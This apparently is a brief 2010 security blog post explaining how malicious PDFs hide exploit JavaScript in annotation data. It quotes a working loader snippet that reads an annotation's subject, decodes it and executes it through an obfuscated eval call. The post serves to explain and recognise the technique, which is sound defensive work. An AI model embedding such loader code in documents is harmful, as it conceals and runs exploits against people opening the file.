Thursday, February 11, 2010

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. The use of getAnnots and syncAnnotScan to iterate through FlateDecode blocks which contain raw encoded data. Inside the encoded data is usually packed obfuscated JavaScript with some recent exploit.

var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;
Posted by at
Labels: , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)